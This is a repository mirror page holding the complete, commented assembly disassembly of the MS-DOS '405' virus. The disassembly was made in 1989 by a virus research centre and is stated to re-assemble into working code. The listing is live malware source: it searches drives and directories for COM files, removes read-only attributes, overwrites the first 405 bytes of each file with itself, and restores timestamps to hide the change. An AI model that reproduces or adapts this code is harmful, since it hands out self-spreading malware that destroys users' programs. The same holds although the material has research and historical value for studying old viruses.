Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
Code Releases Activity
206bedd3f3
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.405_.asm
vxunderground 039994e413
Add files via upload
2021-01-12 17:29:01 -06:00

206 lines
6.3 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

title The '405' virus
page 65,132
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The '405' Virus º
; º Disassembled by Joe Hirst, March 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus overwrites the first 405 bytes of a COM file. If the
; length of the COM file is less than this, the length is increased
; to 405 bytes.
; The disassembly has been tested by re-assembly using MASM 5.0.
BUFFER SEGMENT AT 0
ORG 295H
DW0295 DW ?
DB0297 DB ?
ORG 0E000H
DWE000 DW ? ; Read buffer area
ORG 0E195H
DWE195 DW ? ; Program after virus
BUFFER ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,ES:BUFFER
VIRLEN EQU OFFSET ENDADR-START
ORG 100H
START: XCHG SI,AX
ADD [BX+SI],AL
SAHF
ADD [BX+SI],AL
NOP
MOV AX,0 ; Clear register
MOV ES:DB0249,AL ; Set current disk to default
MOV ES:DB024B,AL ; Set pathname store to zero
MOV ES:DB028B,AL ; Set number of drives to zero
PUSH AX
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB0249,AL ; Save current disk
MOV AH,47H ; Get current directory function
ADD AL,1 ; Next drive (A)
PUSH AX
MOV DL,AL ; Drive A
LEA SI,DB024B ; Pathname store
INT 21H ; DOS service
POP AX
MOV AH,0EH ; Select disk function
SUB AL,1 ; Convert drive for select function
MOV DL,AL ; Move drive
INT 21H ; DOS service
MOV ES:DB028B,AL ; Save number of drives
BP0139: MOV AL,ES:DB0249 ; Get current disk
CMP AL,0 ; Is drive A?
JNZ BP0152 ; Branch if not
MOV AH,0EH ; Select disk function
MOV DL,2 ; Change drive to B
INT 21H ; DOS service
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB024A,AL ; Save new current drive
JMP BP0179
BP0152: CMP AL,1 ; Is drive B?
JNZ BP0167 ; Branch if not
MOV AH,0EH ; Select disk function
MOV DL,2 ; Change drive to C
INT 21H ; DOS service
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB024A,AL ; Save new current drive
JMP BP0179
BP0167: CMP AL,2 ; Is drive C?
JNZ BP0179 ; Branch if not
MOV AH,0EH ; Select disk function
MOV DL,0 ; Change drive to A
INT 21H ; DOS service
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB024A,AL ; Save new current drive
BP0179: MOV AH,4EH ; Find first file function
MOV CX,1 ; Find read-only files, not system
LEA DX,DB028C ; Path '*.COM'
INT 21H ; DOS service
JB BP0189 ; Branch if error
JMP BP01A9 ; Process COM file
BP0189: MOV AH,3BH ; Change current directory function
LEA DX,DB0297 ; Directory pathname (this is past the end)
INT 21H ; DOS service
MOV AH,4EH ; Find first file function
MOV CX,0011H ; Find directory and read-only
LEA DX,DB0292 ; Path '*'
INT 21H ; DOS service
JB BP0139 ; Branch if error
JMP BP0179 ; Find a COM file
BP01A0: MOV AH,4FH ; Find next file function
INT 21H ; DOS service
JB BP0189 ; Branch if error
JMP BP01A9 ; Process COM file
; Process COM file
BP01A9: MOV AH,3DH ; Open handle function
MOV AL,2 ; R/W access
MOV DX,009EH ; File pathname
INT 21H ; DOS service
MOV BX,AX ; Move handle
MOV AH,3FH ; Read handle function
MOV CX,VIRLEN ; Length of virus
NOP
MOV DX,OFFSET DWE000 ; Read it in way down there
NOP
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
MOV BX,DWE000 ; Get first word of COM file
CMP BX,9600H ; Is it infected? (should be 0096H)
JZ BP01A0 ; Yes, find another one
MOV AH,43H ; \ Get file attributes function
MOV AL,0 ; /
MOV DX,009EH ; File pathname
INT 21H ; DOS service
MOV AH,43H ; \ Set file attributes function
MOV AL,1 ; /
AND CX,00FEH ; Set off read only attribute
INT 21H ; DOS service
MOV AH,3DH ; Open handle function
MOV AL,2 ; R/W mode
MOV DX,009EH ; File pathname
INT 21H ; DOS service
MOV BX,AX ; Move handle
MOV AH,57H ; \ Get file date & time function
MOV AL,0 ; /
INT 21H ; DOS service
PUSH CX
PUSH DX
ASSUME ES:NOTHING
MOV DX,CS:DW0295 ; Get word after virus here
MOV CS:DWE195,DX ; Move to same position in prog
MOV DX,CS:DWE000+1 ; Get displacement from initial jump
LEA CX,DB0294-100H ; Length of virus minus one
SUB DX,CX
MOV CS:DW0295,DX ; Store in word after virus
MOV AH,40H ; Write handle function
MOV CX,VIRLEN ; Length of virus
NOP
LEA DX,START ; Beginning of virus
INT 21H ; DOS service
MOV AH,57H ; \ Set file date & time function
MOV AL,1 ; /
POP DX
POP CX
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
MOV DX,CS:DWE195 ; Get word after virus
MOV CS:DW0295,DX ; Move to same position here
JMP BP0234
BP0234: MOV AH,0EH ; Select disk function
MOV DL,CS:DB0249 ; Get current disk
INT 21H ; DOS service
MOV AH,3BH ; Change current directory function
LEA DX,DB024A ; Address of path - this is incorrect
INT 21H ; DOS service
MOV AH,0 ; Terminate program function
INT 21H ; DOS service
DB0249 DB 2 ; Current disk
DB024A DB 0 ; New current drive
; There should be an extra byte at this point containing '\'
; for use by the change directory function - this is why that
; function is pointing at the previous field
DB024B DB 'TEST', 3CH DUP (0)
DB028B DB 0DH ; Number of drives
DB028C DB '*.COM', 0
DB0292 DB '*', 0
DB0294 DB 0E9H
ENDADR EQU $
CODE ENDS
END START

View Git Blame Copy Permalink